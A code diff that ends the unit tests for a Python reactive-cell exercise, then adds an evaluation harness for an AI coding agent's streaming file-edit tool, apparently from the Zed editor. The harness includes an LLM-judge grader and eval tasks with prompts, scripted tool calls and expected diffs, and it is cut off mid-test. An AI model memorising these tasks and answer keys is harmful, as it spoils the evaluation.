input, + ], + lambda inputs: inputs[0] * 30, + ) + output = ComputeCell( + [ + times_two, + times_thirty, + ], + lambda inputs: inputs[0] + inputs[1], + ) + self.assertEqual(output.value, 32) + input.value = 3 + self.assertEqual(output.value, 96) + + def test_compute_cells_fire_callbacks(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 3 + self.assertEqual(cb1_observer[-1], 4) + + def test_callback_cells_only_fire_on_change(self): + input = InputCell(1) + output = ComputeCell([input], lambda inputs: 111 if inputs[0] < 3 else 222) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + input.value = 4 + self.assertEqual(cb1_observer[-1], 222) + + def test_callbacks_do_not_report_already_reported_values(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer[-1], 3) + input.value = 3 + self.assertEqual(cb1_observer[-1], 4) + + def test_callbacks_can_fire_from_multiple_cells(self): + input = InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + cb1_observer = [] + cb2_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + plus_one.add_callback(callback1) + minus_one.add_callback(callback2) + input.value = 10 + self.assertEqual(cb1_observer[-1], 11) + self.assertEqual(cb2_observer[-1], 9) + + def test_callbacks_can_be_added_and_removed(self): + input = InputCell(11) + output = ComputeCell( + [ + input, + ], + 
lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + cb2_observer = [] + cb3_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + callback3 = self.callback_factory(cb3_observer) + output.add_callback(callback1) + output.add_callback(callback2) + input.value = 31 + self.assertEqual(cb1_observer[-1], 32) + self.assertEqual(cb2_observer[-1], 32) + output.remove_callback(callback1) + output.add_callback(callback3) + input.value = 41 + self.assertEqual(len(cb1_observer), 1) + self.assertEqual(cb2_observer[-1], 42) + self.assertEqual(cb3_observer[-1], 42) + + def test_removing_a_callback_multiple_times_doesn_t_interfere_with_other_callbacks( + self, + ): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + cb2_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + output.add_callback(callback1) + output.add_callback(callback2) + output.remove_callback(callback1) + output.remove_callback(callback1) + output.remove_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + self.assertEqual(cb2_observer[-1], 3) + + def test_callbacks_should_only_be_called_once_even_if_multiple_dependencies_change( + self, + ): + input = InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one1 = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + minus_one2 = ComputeCell( + [ + minus_one1, + ], + lambda inputs: inputs[0] - 1, + ) + output = ComputeCell( + [ + plus_one, + minus_one2, + ], + lambda inputs: inputs[0] * inputs[1], + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 4 + self.assertEqual(cb1_observer[-1], 10) + + def test_callbacks_should_not_be_called_if_dependencies_change_but_output_value_doesn_t_change( + self, + ): + input = 
InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + always_two = ComputeCell( + [ + plus_one, + minus_one, + ], + lambda inputs: inputs[0] - inputs[1], + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + always_two.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + input.value = 3 + self.assertEqual(cb1_observer, []) + input.value = 4 + self.assertEqual(cb1_observer, []) + input.value = 5 + self.assertEqual(cb1_observer, []) + + # Utility functions. + def callback_factory(self, observer): + def callback(observer, value): + observer.append(value) + + return partial(callback, observer) diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs new file mode 100644 index 0000000000000000000000000000000000000000..0c6290ec098f9c37a0f6a077daf0a041c013d8ff --- /dev/null +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -0,0 +1,1570 @@ +use crate::tools::streaming_edit_file_tool::*; +use crate::{ + AgentTool, ContextServerRegistry, EditFileTool, GrepTool, GrepToolInput, ListDirectoryTool, + ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, StreamingEditFileTool, Template, + Templates, Thread, ToolCallEventStream, ToolInput, +}; +use Role::*; +use anyhow::{Context as _, Result}; +use client::{Client, RefreshLlmTokenListener, UserStore}; +use fs::FakeFs; +use futures::{FutureExt, StreamExt, future::LocalBoxFuture}; +use gpui::{AppContext as _, AsyncApp, Entity, TestAppContext, UpdateGlobal as _}; +use http_client::StatusCode; +use language::language_settings::FormatOnSave; +use language_model::{ + LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, + LanguageModelRequestTool, LanguageModelToolResult, 
LanguageModelToolResultContent, + LanguageModelToolSchemaFormat, LanguageModelToolUse, LanguageModelToolUseId, MessageContent, + Role, SelectedModel, +}; +use project::Project; +use prompt_store::{ProjectContext, WorktreeContext}; +use rand::prelude::*; +use reqwest_client::ReqwestClient; +use serde::Serialize; +use serde_json::json; +use settings::SettingsStore; +use std::{ + fmt::{self, Display}, + path::{Path, PathBuf}, + str::FromStr, + sync::Arc, + time::Duration, +}; +use util::path; + +#[derive(Serialize)] +struct DiffJudgeTemplate { + diff: String, + assertions: &'static str, +} + +impl Template for DiffJudgeTemplate { + const TEMPLATE_NAME: &'static str = "diff_judge.hbs"; +} + +#[derive(Clone)] +struct EvalInput { + conversation: Vec, + input_file_path: PathBuf, + input_content: Option, + assertion: EvalAssertion, +} + +impl EvalInput { + fn new( + conversation: Vec, + input_file_path: impl Into, + input_content: Option, + assertion: EvalAssertion, + ) -> Self { + EvalInput { + conversation, + input_file_path: input_file_path.into(), + input_content, + assertion, + } + } +} + +#[derive(Clone)] +struct EvalSample { + text_before: String, + text_after: String, + tool_input: StreamingEditFileToolInput, + diff: String, +} + +trait AssertionFn: 'static + Send + Sync { + fn assert<'a>( + &'a self, + sample: &'a EvalSample, + judge_model: Arc, + cx: &'a mut TestAppContext, + ) -> LocalBoxFuture<'a, Result>; +} + +impl AssertionFn for F +where + F: 'static + + Send + + Sync + + AsyncFn( + &EvalSample, + Arc, + &mut TestAppContext, + ) -> Result, +{ + fn assert<'a>( + &'a self, + sample: &'a EvalSample, + judge_model: Arc, + cx: &'a mut TestAppContext, + ) -> LocalBoxFuture<'a, Result> { + (self)(sample, judge_model, cx).boxed_local() + } +} + +#[derive(Clone)] +struct EvalAssertion(Arc); + +impl EvalAssertion { + fn new(f: F) -> Self + where + F: 'static + + Send + + Sync + + AsyncFn( + &EvalSample, + Arc, + &mut TestAppContext, + ) -> Result, + { + 
EvalAssertion(Arc::new(f)) + } + + fn assert_eq(expected: impl Into) -> Self { + let expected = expected.into(); + Self::new(async move |sample, _judge, _cx| { + Ok(EvalAssertionOutcome { + score: if strip_empty_lines(&sample.text_after) == strip_empty_lines(&expected) { + 100 + } else { + 0 + }, + message: None, + }) + }) + } + + fn assert_diff_any(expected_diffs: Vec>) -> Self { + let expected_diffs: Vec = expected_diffs.into_iter().map(Into::into).collect(); + Self::new(async move |sample, _judge, _cx| { + let matches = expected_diffs.iter().any(|possible_diff| { + language::apply_diff_patch(&sample.text_before, possible_diff) + .map(|expected| { + strip_empty_lines(&expected) == strip_empty_lines(&sample.text_after) + }) + .unwrap_or(false) + }); + + Ok(EvalAssertionOutcome { + score: if matches { 100 } else { 0 }, + message: None, + }) + }) + } + + fn judge_diff(assertions: &'static str) -> Self { + Self::new(async move |sample, judge, cx| { + let prompt = DiffJudgeTemplate { + diff: sample.diff.clone(), + assertions, + } + .render(&Templates::new()) + .context("Failed to render diff judge template")?; + + let request = LanguageModelRequest { + messages: vec![LanguageModelRequestMessage { + role: Role::User, + content: vec![prompt.into()], + cache: false, + reasoning_details: None, + }], + thinking_allowed: true, + thinking_effort: judge + .default_effort_level() + .map(|effort_level| effort_level.value.to_string()), + ..Default::default() + }; + let mut response = retry_on_rate_limit(async || { + Ok(judge + .stream_completion_text(request.clone(), &cx.to_async()) + .await?) 
+ }) + .await?; + let mut output = String::new(); + while let Some(chunk) = response.stream.next().await { + let chunk = chunk?; + output.push_str(&chunk); + } + + let re = regex::Regex::new(r"(\d+)") + .context("Failed to compile score regex")?; + if let Some(captures) = re.captures(&output) + && let Some(score_match) = captures.get(1) + { + let score = score_match.as_str().parse().unwrap_or(0); + return Ok(EvalAssertionOutcome { + score, + message: Some(output), + }); + } + + anyhow::bail!("No score found in response. Raw output: {output}"); + }) + } + + async fn run( + &self, + input: &EvalSample, + judge_model: Arc, + cx: &mut TestAppContext, + ) -> Result { + self.0.assert(input, judge_model, cx).await + } +} + +#[derive(Clone)] +struct StreamingEditEvalOutput { + sample: EvalSample, + assertion: EvalAssertionOutcome, +} + +impl Display for StreamingEditEvalOutput { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + writeln!(f, "Score: {:?}", self.assertion.score)?; + if let Some(message) = self.assertion.message.as_ref() { + writeln!(f, "Message: {}", message)?; + } + writeln!(f, "Diff:\n{}", self.sample.diff)?; + writeln!(f, "Tool Input:\n{:#?}", self.sample.tool_input)?; + Ok(()) + } +} + +#[derive(Clone, Debug, Eq, PartialEq, Hash)] +struct EvalAssertionOutcome { + score: usize, + message: Option, +} + +struct StreamingEditToolTest { + fs: Arc, + project: Entity, + model: Arc, + judge_model: Arc, + model_thinking_effort: Option, +} + +impl StreamingEditToolTest { + async fn new(cx: &mut TestAppContext) -> Self { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.executor()); + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings + .project + .all_languages + .defaults + .ensure_final_newline_on_save = Some(false); + settings.project.all_languages.defaults.format_on_save 
= + Some(FormatOnSave::Off); + }); + }); + + gpui_tokio::init(cx); + let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); + cx.set_http_client(http_client); + let client = Client::production(cx); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store, client, cx); + }); + + fs.insert_tree("/root", json!({})).await; + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let agent_model = SelectedModel::from_str( + &std::env::var("ZED_AGENT_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + let judge_model = SelectedModel::from_str( + &std::env::var("ZED_JUDGE_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + + let authenticate_provider_tasks = cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }) + }); + let (model, judge_model) = cx + .update(|cx| { + cx.spawn(async move |cx| { + futures::future::join_all(authenticate_provider_tasks).await; + let model = Self::load_model(&agent_model, cx).await; + let judge_model = Self::load_model(&judge_model, cx).await; + (model.unwrap(), judge_model.unwrap()) + }) + }) + .await; + + let model_thinking_effort = model + .default_effort_level() + .map(|effort_level| effort_level.value.to_string()); + + Self { + fs, + project, + model, + judge_model, + model_thinking_effort, + } + } + + async fn load_model( + selected_model: &SelectedModel, + cx: &mut AsyncApp, + ) -> Result> { + cx.update(|cx| { + let registry = LanguageModelRegistry::read_global(cx); + let provider = registry + .provider(&selected_model.provider) + .expect("Provider not found"); + provider.authenticate(cx) + }) + .await?; + Ok(cx.update(|cx| { + let models = 
LanguageModelRegistry::read_global(cx); + models + .available_models(cx) + .find(|model| { + model.provider_id() == selected_model.provider + && model.id() == selected_model.model + }) + .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)) + })) + } + + /// Build the tool definitions for the model, replacing `edit_file` with the + /// streaming edit file tool schema. In production the streaming tool is + /// exposed under the name `"edit_file"` (see `Thread::enabled_tools`), so + /// the model has never seen the name `"streaming_edit_file"`. + fn build_tools() -> Vec { + let mut tools: Vec = crate::built_in_tools() + .filter(|tool| tool.name != EditFileTool::NAME) + .collect(); + tools.push(LanguageModelRequestTool { + name: EditFileTool::NAME.to_string(), + description: StreamingEditFileTool::description().to_string(), + input_schema: StreamingEditFileTool::input_schema( + LanguageModelToolSchemaFormat::JsonSchema, + ) + .to_value(), + use_input_streaming: StreamingEditFileTool::supports_input_streaming(), + }); + tools + } + + async fn eval( + &self, + mut eval: EvalInput, + cx: &mut TestAppContext, + ) -> Result { + eval.conversation + .last_mut() + .context("Conversation must not be empty")? + .cache = true; + + // Populate the FakeFs so `resolve_path` / `entry_for_path` can find + // the file in the worktree. + if let Some(input_content) = eval.input_content.as_deref() { + let abs_path = Path::new("/root").join( + eval.input_file_path + .strip_prefix("root") + .unwrap_or(&eval.input_file_path), + ); + self.fs.insert_file(&abs_path, input_content.into()).await; + + // Wait for the worktree to pick up the new file. 
+ cx.run_until_parked(); + } + + let tools = Self::build_tools(); + + let system_prompt = { + let worktrees = vec![WorktreeContext { + root_name: "root".to_string(), + abs_path: Path::new("/path/to/root").into(), + rules_file: None, + }]; + let project_context = ProjectContext::new(worktrees, Vec::default()); + let tool_names = tools + .iter() + .map(|tool| tool.name.clone().into()) + .collect::>(); + let template = crate::SystemPromptTemplate { + project: &project_context, + available_tools: tool_names, + model_name: None, + }; + let templates = Templates::new(); + template.render(&templates)? + }; + + let has_system_prompt = eval + .conversation + .first() + .is_some_and(|msg| msg.role == Role::System); + let messages = if has_system_prompt { + eval.conversation + } else { + [LanguageModelRequestMessage { + role: Role::System, + content: vec![MessageContent::Text(system_prompt)], + cache: true, + reasoning_details: None, + }] + .into_iter() + .chain(eval.conversation) + .collect::>() + }; + + let request = LanguageModelRequest { + messages, + tools, + thinking_allowed: true, + thinking_effort: self.model_thinking_effort.clone(), + ..Default::default() + }; + + // The model will call the tool as "edit_file" (the production-visible + // name), but the schema is from StreamingEditFileTool. 
+ let tool_input = + retry_on_rate_limit(async || self.extract_tool_use(request.clone(), cx).await).await?; + + let language_registry = self + .project + .read_with(cx, |project, _cx| project.languages().clone()); + + let context_server_registry = cx + .new(|cx| ContextServerRegistry::new(self.project.read(cx).context_server_store(), cx)); + let thread = cx.new(|cx| { + Thread::new( + self.project.clone(), + cx.new(|_cx| ProjectContext::default()), + context_server_registry, + Templates::new(), + Some(self.model.clone()), + cx, + ) + }); + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); + + let tool = Arc::new(StreamingEditFileTool::new( + self.project.clone(), + thread.downgrade(), + action_log, + language_registry, + )); + + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(tool_input.clone()), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let output = match result { + Ok(output) => output, + Err(output) => { + anyhow::bail!("Tool returned error: {}", output); + } + }; + + let StreamingEditFileToolOutput::Success { new_text, .. } = &output else { + anyhow::bail!("Tool returned error output: {}", output); + }; + + let sample = EvalSample { + tool_input, + diff: language::unified_diff( + eval.input_content.as_deref().unwrap_or_default(), + new_text, + ), + text_before: eval.input_content.unwrap_or_default(), + text_after: new_text.clone(), + }; + + let assertion = eval + .assertion + .run(&sample, self.judge_model.clone(), cx) + .await?; + + Ok(StreamingEditEvalOutput { assertion, sample }) + } + + /// Stream the model completion and extract the first complete tool use + /// whose name matches `EditFileTool::NAME` (the production-visible name + /// for the streaming edit tool), parsed as `StreamingEditFileToolInput`. 
+ async fn extract_tool_use( + &self, + request: LanguageModelRequest, + cx: &mut TestAppContext, + ) -> Result { + let model = self.model.clone(); + let events = cx + .update(|cx| { + let async_cx = cx.to_async(); + cx.foreground_executor() + .spawn(async move { model.stream_completion(request, &async_cx).await }) + }) + .await + .map_err(|err| anyhow::anyhow!("completion error: {}", err))?; + + let mut streamed_text = String::new(); + let mut stop_reason = None; + let mut parse_errors = Vec::new(); + + let mut events = events.fuse(); + while let Some(event) = events.next().await { + match event { + Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) + if tool_use.is_input_complete + && tool_use.name.as_ref() == EditFileTool::NAME => + { + let input: StreamingEditFileToolInput = serde_json::from_value(tool_use.input) + .context("Failed to parse tool input as StreamingEditFileToolInput")?; + return Ok(input); + } + Ok(LanguageModelCompletionEvent::Text(text)) => { + if streamed_text.len() < 2_000 { + streamed_text.push_str(&text); + } + } + Ok(LanguageModelCompletionEvent::Stop(reason)) => { + stop_reason = Some(reason); + } + Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { + tool_name, + raw_input, + json_parse_error, + .. 
+ }) if tool_name.as_ref() == EditFileTool::NAME => { + parse_errors.push(format!("{json_parse_error}\nRaw input:\n{raw_input:?}")); + } + Err(err) => { + return Err(anyhow::anyhow!("completion error: {}", err)); + } + _ => {} + } + } + + let streamed_text = streamed_text.trim(); + let streamed_text_suffix = if streamed_text.is_empty() { + String::new() + } else { + format!("\nStreamed text:\n{streamed_text}") + }; + let stop_reason_suffix = stop_reason + .map(|reason| format!("\nStop reason: {reason:?}")) + .unwrap_or_default(); + let parse_errors_suffix = if parse_errors.is_empty() { + String::new() + } else { + format!("\nTool parse errors:\n{}", parse_errors.join("\n")) + }; + + anyhow::bail!( + "Stream ended without an edit_file tool use{stop_reason_suffix}{parse_errors_suffix}{streamed_text_suffix}" + ) + } +} + +fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { + let dispatcher = gpui::TestDispatcher::new(rand::random()); + let mut cx = TestAppContext::build(dispatcher, None); + let foreground_executor = cx.foreground_executor().clone(); + let result = foreground_executor.block_test(async { + let test = StreamingEditToolTest::new(&mut cx).await; + let result = test.eval(eval, &mut cx).await; + drop(test); + cx.run_until_parked(); + result + }); + cx.quit(); + match result { + Ok(output) => eval_utils::EvalOutput { + data: output.to_string(), + outcome: if output.assertion.score < 80 { + eval_utils::OutcomeKind::Failed + } else { + eval_utils::OutcomeKind::Passed + }, + metadata: (), + }, + Err(err) => eval_utils::EvalOutput { + data: format!("{err:?}"), + outcome: eval_utils::OutcomeKind::Error, + metadata: (), + }, + } +} + +fn message( + role: Role, + contents: impl IntoIterator, +) -> LanguageModelRequestMessage { + LanguageModelRequestMessage { + role, + content: contents.into_iter().collect(), + cache: false, + reasoning_details: None, + } +} + +fn text(text: impl Into) -> MessageContent { + MessageContent::Text(text.into()) +} + +fn 
lines(input: &str, range: std::ops::Range) -> String { + input + .lines() + .skip(range.start) + .take(range.len()) + .collect::>() + .join("\n") +} + +fn tool_use( + id: impl Into>, + name: impl Into>, + input: impl Serialize, +) -> MessageContent { + MessageContent::ToolUse(LanguageModelToolUse { + id: LanguageModelToolUseId::from(id.into()), + name: name.into(), + raw_input: serde_json::to_string_pretty(&input).unwrap(), + input: serde_json::to_value(input).unwrap(), + is_input_complete: true, + thought_signature: None, + }) +} + +fn tool_result( + id: impl Into>, + name: impl Into>, + result: impl Into>, +) -> MessageContent { + MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: LanguageModelToolUseId::from(id.into()), + tool_name: name.into(), + is_error: false, + content: LanguageModelToolResultContent::Text(result.into()), + output: None, + }) +} + +fn strip_empty_lines(text: &str) -> String { + text.lines() + .filter(|line| !line.trim().is_empty()) + .collect::>() + .join("\n") +} + +async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { + const MAX_RETRIES: usize = 20; + let mut attempt = 0; + + loop { + attempt += 1; + let response = request().await; + + if attempt >= MAX_RETRIES { + return response; + } + + let retry_delay = match &response { + Ok(_) => None, + Err(err) => match err.downcast_ref::() { + Some(err) => match &err { + LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } + | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } + LanguageModelCompletionError::UpstreamProviderError { + status, + retry_after, + .. 
+ } => { + let should_retry = matches!( + *status, + StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE + ) || status.as_u16() == 529; + + if should_retry { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } else { + None + } + } + LanguageModelCompletionError::ApiReadResponseError { .. } + | LanguageModelCompletionError::ApiInternalServerError { .. } + | LanguageModelCompletionError::HttpSend { .. } => { + Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) + } + _ => None, + }, + _ => None, + }, + }; + + if let Some(retry_after) = retry_delay { + let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); + eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); + #[allow(clippy::disallowed_methods)] + smol::Timer::after(retry_after + jitter).await; + } else { + return response; + } + } +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_delete_function() { + let input_file_path = "root/blame.rs"; + let input_file_content = include_str!("fixtures/delete_run_git_blame/before.rs"); + let output_file_content = include_str!("fixtures/delete_run_git_blame/after.rs"); + let possible_diffs = vec![ + language::unified_diff(input_file_content, output_file_content), + language::unified_diff( + input_file_content, + &output_file_content + .replace( + "const GIT_BLAME_NO_COMMIT_ERROR: &str = \"fatal: no such ref: HEAD\";\n", + "", + ) + .replace( + "const GIT_BLAME_NO_PATH: &str = \"fatal: no such path\";\n", + "", + ), + ), + ]; + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and delete `run_git_blame`. Just that + one function, not its usages. 
+ "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_extract_handle_command_output() { + let input_file_path = "root/blame.rs"; + let input_file_content = include_str!("fixtures/extract_handle_command_output/before.rs"); + let possible_diffs = vec![ + include_str!("fixtures/extract_handle_command_output/possible-01.diff"), + include_str!("fixtures/extract_handle_command_output/possible-02.diff"), + include_str!("fixtures/extract_handle_command_output/possible-03.diff"), + include_str!("fixtures/extract_handle_command_output/possible-04.diff"), + include_str!("fixtures/extract_handle_command_output/possible-05.diff"), + include_str!("fixtures/extract_handle_command_output/possible-06.diff"), + include_str!("fixtures/extract_handle_command_output/possible-07.diff"), + include_str!("fixtures/extract_handle_command_output/possible-08.diff"), + include_str!("fixtures/extract_handle_command_output/possible-09.diff"), + ]; + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and extract a method in + the final stanza of `run_git_blame` to deal with command failures, + call it `handle_command_output` and take the std::process::Output as the only parameter. + Do not document the method and do not add any comments. + + Add it right next to `run_git_blame` and copy it verbatim from `run_git_blame`. 
+ "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_translate_doc_comments() { + let input_file_path = "root/canvas.rs"; + let input_file_content = include_str!("fixtures/translate_doc_comments/before.rs"); + + eval_utils::eval(200, 1., eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and edit it (without overwriting it), + translating all the doc comments to italian. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff("Doc comments were translated to Italian"), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_use_wasi_sdk_in_compile_parser_to_wasm() { + let input_file_path = "root/lib.rs"; + let input_file_content = + include_str!("fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs"); + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and change `compile_parser_to_wasm` to use `wasi-sdk` instead of emscripten. + Use `ureq` to download the SDK for the current platform and architecture. 
+ Extract the archive into a sibling of `lib` inside the `tree-sitter` directory in the cache_dir. + Compile the parser to wasm using the `bin/clang` executable (or `bin/clang.exe` on windows) + that's inside of the archive. + Don't re-download the SDK if that executable already exists. + + Use these clang flags: -fPIC -shared -Os -Wl,--export=tree_sitter_{{language_name}} + + Here are the available wasi-sdk assets: + - wasi-sdk-25.0-x86_64-macos.tar.gz + - wasi-sdk-25.0-arm64-macos.tar.gz + - wasi-sdk-25.0-x86_64-linux.tar.gz + - wasi-sdk-25.0-arm64-linux.tar.gz + - wasi-sdk-25.0-x86_64-linux.tar.gz + - wasi-sdk-25.0-arm64-linux.tar.gz + - wasi-sdk-25.0-x86_64-windows.tar.gz + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(971), + end_line: Some(1050), + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + lines(input_file_content, 971..1050), + )], + ), + message( + Assistant, + [tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1050), + end_line: Some(1100), + }, + )], + ), + message( + User, + [tool_result( + "tool_2", + ReadFileTool::NAME, + lines(input_file_content, 1050..1100), + )], + ), + message( + Assistant, + [tool_use( + "tool_3", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1100), + end_line: Some(1150), + }, + )], + ), + message( + User, + [tool_result( + "tool_3", + ReadFileTool::NAME, + lines(input_file_content, 1100..1150), + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff(indoc::indoc! 
{" + - The compile_parser_to_wasm method has been changed to use wasi-sdk + - ureq is used to download the SDK for current platform and architecture + "}), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_disable_cursor_blinking() { + let input_file_path = "root/editor.rs"; + let input_file_content = include_str!("fixtures/disable_cursor_blinking/before.rs"); + let possible_diffs = vec![ + include_str!("fixtures/disable_cursor_blinking/possible-01.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-02.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-03.diff"), + include_str!("fixtures/disable_cursor_blinking/possible-04.diff"), + ]; + + eval_utils::eval(100, 0.51, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text("Let's research how to cursor blinking works.")]), + message( + Assistant, + [tool_use( + "tool_1", + GrepTool::NAME, + GrepToolInput { + regex: "blink".into(), + include_pattern: None, + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + GrepTool::NAME, + [ + lines(input_file_content, 100..400), + lines(input_file_content, 800..1300), + lines(input_file_content, 1600..2000), + lines(input_file_content, 5000..5500), + lines(input_file_content, 8000..9000), + lines(input_file_content, 18455..18470), + lines(input_file_content, 20000..20500), + lines(input_file_content, 21000..21300), + ] + .join("Match found:\n\n"), + )], + ), + message( + User, + [text(indoc::indoc! {" + Comment out the lines that interact with the BlinkManager. + Keep the outer `update` blocks, but comments everything that's inside (including if statements). + Don't add additional comments. 
+ "})], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_from_pixels_constructor() { + let input_file_path = "root/canvas.rs"; + let input_file_content = include_str!("fixtures/from_pixels_constructor/before.rs"); + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::indoc! {" + Introduce a new `from_pixels` constructor in Canvas and + also add tests for it in the same file. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + message( + Assistant, + [tool_use( + "tool_2", + GrepTool::NAME, + GrepToolInput { + regex: "mod\\s+tests".into(), + include_pattern: Some("font-kit/src/canvas.rs".into()), + offset: 0, + 